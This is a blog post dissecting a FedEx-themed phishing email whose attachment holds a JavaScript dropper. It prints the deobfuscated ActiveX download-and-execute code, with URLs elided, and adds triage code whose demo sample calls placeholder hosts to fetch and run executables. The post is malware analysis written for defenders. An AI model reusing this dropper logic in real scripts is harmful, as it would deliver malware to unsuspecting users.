Wednesday, 10 December 2014

FedEx sent me a free parcel... should I sign for karate lessons?

Yesterday I received a nice-looking FedEx email with information about a shipment delivery problem. I was not expecting any shipment and I am always cautious about emails with archive attachments, so I started my analysis.

The email looks nearly perfect: it contains the FedEx logo, an agent name and proper English grammar. The only thing which is suspicious is the source address of the sender:

However, a simple analysis of the SMTP headers disclosed the "real" address of the sender, along with the software used in this phishing campaign:

Right. It seems that the email was sent from an IP address (potentially a proxy or VPN server) which belongs to HostEurope GmbH:

inetnum: -
remarks:        INFRA-AW
netname:        DE-HE-LVPS-CGN3-NET
descr:          Host Europe GmbH
country:        DE
admin-c:        HER
tech-c:         HER
status:         ASSIGNED PA
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

role:           Host Europe Ripehandle
address:        Welserstrasse 14
address:        51149 Koeln
phone:          +49 2203 1045 0
admin-c:        BURN
admin-c:        HONK
admin-c:        JUPP
admin-c:        MATE
admin-c:        METT
admin-c:        MOMO
admin-c:        OUZO
admin-c:        SEPP
admin-c:        WIRR
tech-c:         BURN
tech-c:         HONK
tech-c:         JUPP
tech-c:         MATE
tech-c:         METT
tech-c:         MOMO
tech-c:         OUZO
tech-c:         SEPP
tech-c:         WIRR
nic-hdl:        HER
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

% Information related to ''

descr:          DE-HER-178-77-64-SLASH-18
origin:         AS20773
member-of:      AS20773:RS-HOSTEUROPE
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

Ok, let's dig into the suspicious attachment itself. The first thing I noticed is that the archive contains just a single JavaScript file:
The payload itself contains lightly obfuscated JavaScript code. The obfuscation uses a chain of functions: each function appends its own string fragment to the supplied argument and passes the result to the next one, until the last function evals the reassembled code. This method is simple, yet effective:
define function _N(x) { call _N+1(x + truncated_string1); }
define function _N+1(x) { call _N+2(x + truncated_string2); }
define function _N+2(x) { call _N+3(x + truncated_string3); }
...
define function _N+166(x) { call _N+167(x + truncated_string166); }
define function _N+167(x) { eval(x); }
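The chain above can be unrolled statically, without ever executing the sample. The following is an added example (not code from the original post): it parses every link of the form `function NAME(arg) { NEXT(arg + "fragment"); }`, finds the entry function (the one nobody calls), follows the chain to the `eval` sink and rebuilds the string on the way. The obfuscated input is constructed for the demo with a benign payload; the function names `_0`..`_5` and the helper names are assumptions, not the real dropper's.

```javascript
// Added example: static unrolling of a "function chain" obfuscator.
// The sample below is constructed for this demo; its payload is benign.
const SAMPLE = `
function _0(x) { _1(x + "var pa"); }
function _1(x) { _2(x + "yload = "); }
function _2(x) { _3(x + "'hello'"); }
function _3(x) { _4(x + " + ' wor"); }
function _4(x) { _5(x + "ld';"); }
function _5(x) { eval(x); }
_0("");
`;

// One link: function NAME(ARG) { NEXT(ARG + "LITERAL"); }
const LINK_RE = /function\s+(\w+)\s*\((\w+)\)\s*\{\s*(\w+)\s*\(\s*\2\s*\+\s*(["'])((?:\\.|(?!\4)[^\\])*)\4\s*\)\s*;?\s*\}/g;
// The terminal link: function NAME(ARG) { eval(ARG); }
const EVAL_RE = /function\s+(\w+)\s*\((\w+)\)\s*\{\s*eval\s*\(\s*\2\s*\)\s*;?\s*\}/g;

// Decode the escapes that may appear inside a quoted fragment.
function unescapeLiteral(s) {
  return s.replace(/\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[\s\S])/g, (_, e) => {
    if (e[0] === "x" || e[0] === "u") return String.fromCharCode(parseInt(e.slice(1), 16));
    return { n: "\n", r: "\r", t: "\t", 0: "\0" }[e] || e;
  });
}

// Returns the reassembled payload plus where the chain ends, so the analyst
// can confirm it really terminates in eval before reading the result.
function unrollChain(src) {
  const links = new Map();                       // name -> { next, fragment }
  for (const m of src.matchAll(LINK_RE)) {
    links.set(m[1], { next: m[3], fragment: unescapeLiteral(m[5]) });
  }
  const sinks = new Set([...src.matchAll(EVAL_RE)].map(m => m[1]));

  // The entry point is the only link that no other link calls.
  const called = new Set([...links.values()].map(l => l.next));
  const roots = [...links.keys()].filter(n => !called.has(n));
  if (roots.length !== 1) throw new Error("expected one chain entry, found " + roots.length);
  let cur = roots[0];

  // Seed string passed at the top-level call, e.g. _0("").
  const seedRe = new RegExp("^\\s*" + cur + "\\s*\\(\\s*([\"'])((?:\\\\.|(?!\\1)[^\\\\])*)\\1", "m");
  const seed = src.match(seedRe);
  let payload = seed ? unescapeLiteral(seed[2]) : "";

  // Walk the chain, appending each fragment; guard against loops.
  let hops = 0;
  const seen = new Set();
  while (links.has(cur)) {
    if (seen.has(cur)) throw new Error("cycle at " + cur);
    seen.add(cur);
    payload += links.get(cur).fragment;
    cur = links.get(cur).next;
    hops++;
  }
  return { payload, terminal: cur, reachesEval: sinks.has(cur), hops };
}

console.log(unrollChain(SAMPLE));
```

For the real sample the same walk covers all 167 links; the reassembled string is the `dl(...)` dropper shown further down, and `reachesEval` confirms the chain ends in the `eval` sink rather than in some other function the regex did not understand.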
To deobfuscate this code I used an online JavaScript deobfuscator/unpacker available at The final code looks like this:
function dl(fr,fn,rn) {
    var ws = new ActiveXObject("WScript.Shell");
    // drop path: %TEMP%\<fn> (String.fromCharCode(92) is the backslash)
    var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            // write the HTTP response body to disk as a binary stream
            var xa = new ActiveXObject("ADODB.Stream");
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn,2);
            xa.close();
        };
    };
    try {
        // the "xo.open(" prefix is missing from the extracted listing; restored here
        xo.open("GET",fr,false);
        xo.send();
        // rn > 0: execute the dropped file in a hidden window
        if (rn > 0) { ws.Run(fn,0,0); };
    } catch (er) { };
};
// download URLs elided in the post
dl("","52240608.exe",1);
dl("","37844845.exe",1);
dl("","12214282.exe",1);
//info.ActiveXObject WScript.Shell
Now it is much easier to understand what this code does: when the file is downloaded and unpacked it automatically belongs to the Local (My Computer) Zone. In this zone an ActiveXObject can be created without any notification to the user (more info here). When a victim executes the file, the code downloads and executes malicious PE executables from the host. Let's see who the owner of this domain is and whether it was registered recently (an indicator that it may have been set up specifically for attacks) or some time ago (potentially pwned).
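Once the chain is unrolled, the dropper can be triaged without running it. This added example (not the post's code) scans a deobfuscated script for the COM/ActiveX behaviours a WScript downloader needs and extracts every `dl(url, filename, runFlag)` call as an indicator. The sample script is constructed for the demo; the hosts are `example.invalid` placeholders, not the campaign's, and the verdict thresholds are my own judgement call.

```javascript
// Added example: static triage of a deobfuscated WScript dropper.
// Constructed sample; hosts are placeholders, not the real campaign's.
const DEOBFUSCATED = `
function dl(fr,fn,rn) { var ws = new ActiveXObject("WScript.Shell");
  var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.onreadystatechange = function() { if (xo.readyState === 4) {
    var xa = new ActiveXObject("ADODB.Stream"); xa.type = 1;
    xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; };
  try { xo.open("GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; };
dl("http://dropper.example.invalid/a.php","52240608.exe",1);
dl("http://dropper.example.invalid/b.php","37844845.exe",1);
dl("http://mirror.example.invalid/c.php","12214282.exe",0);
`;

// Behaviours a download-and-execute script needs; each one seen is a hit.
const INDICATORS = [
  ["WScript.Shell",           /ActiveXObject\s*\(\s*["']WScript\.Shell["']\s*\)/],
  ["MSXML2.XMLHTTP download", /ActiveXObject\s*\(\s*["']MSXML2\.XMLHTTP["']\s*\)/],
  ["ADODB.Stream file write", /ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)/],
  ["saveToFile",              /\.saveToFile\s*\(/],
  ["%TEMP% drop path",        /ExpandEnvironmentStrings\s*\(\s*["']%TEMP%["']\s*\)/],
  ["WScript.Shell.Run",       /\.Run\s*\(/],
];

// dl("url","filename",runFlag) -- the helper name is taken from the sample.
const DL_CALL_RE = /\bdl\s*\(\s*(["'])(.*?)\1\s*,\s*(["'])(.*?)\3\s*,\s*(\d+)\s*\)/g;

function triage(src) {
  const hits = INDICATORS.filter(([, re]) => re.test(src)).map(([name]) => name);
  const downloads = [];
  for (const m of src.matchAll(DL_CALL_RE)) {
    downloads.push({ url: m[2], filename: m[4], autoRun: Number(m[5]) > 0 });
  }
  // Thresholds are a judgement call for this demo, not a published standard.
  let verdict = "clean";
  if (hits.length >= 4 && downloads.length > 0) verdict = "dropper";
  else if (hits.length >= 2) verdict = "suspicious";
  return { hits, downloads, verdict };
}

// Distinct download hosts: what goes on the block list / into the DNS sinkhole.
function uniqueHosts(report) {
  return [...new Set(report.downloads.map(d => new URL(d.url).host))];
}

const report = triage(DEOBFUSCATED);
console.log(report.verdict, report.hits);
console.log(report.downloads, uniqueHosts(report));
```

The hit list mirrors the narrative above (shell object, XMLHTTP fetch, ADODB.Stream write into `%TEMP%`, then `Run`), and the extracted hosts and filenames are the indicators to feed into mail-gateway and proxy blocking.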
To continue with the analysis I used RobTex, a Swiss Army Knife Internet tool (full analysis here). From the analysis:
Zuari Agro Chemicals Ltd. Overview. Zuari is a single-window agricultural solution provider.
The domain was registered on 16-Feb-2005; the authoritative nameservers and everything else (NS, MX, shared hosting, etc.) are outsourced to an external provider. My initial assumption that this host was simply pwned seems to be right.

But hey, what about the executables? I think it is a good time to take a closer look at them! To download them from the host I used curl through a VPN connection (I simply don't like to stay in the logs). It is worth noting that only certain User-Agents are able to download our malicious executables, since the attacker validates User-Agent strings:

  • curl with default UA string:
  • curl with standard Internet Explorer UA string:

Armed with this knowledge I downloaded all the samples referenced in the original JavaScript file:

Next, I checked the scoring of these files on

So, even if these files are no longer FUD, they still have a relatively low detection rate. Perhaps these files have been used in some current phishing campaign but have not been updated recently. To get more information without actually analysing these files locally (I know that sometimes I am too lazy) I used a service which provides a web interface to Cuckoo Sandbox.

Ok, we are at the end of part 1 (apologies, but posting blog entries is not my main activity). In part 2 I am going to dissect the malware using static and dynamic approaches (fans of WinDbg, Immunity Debugger and IDA Pro are welcome!).

See you soon!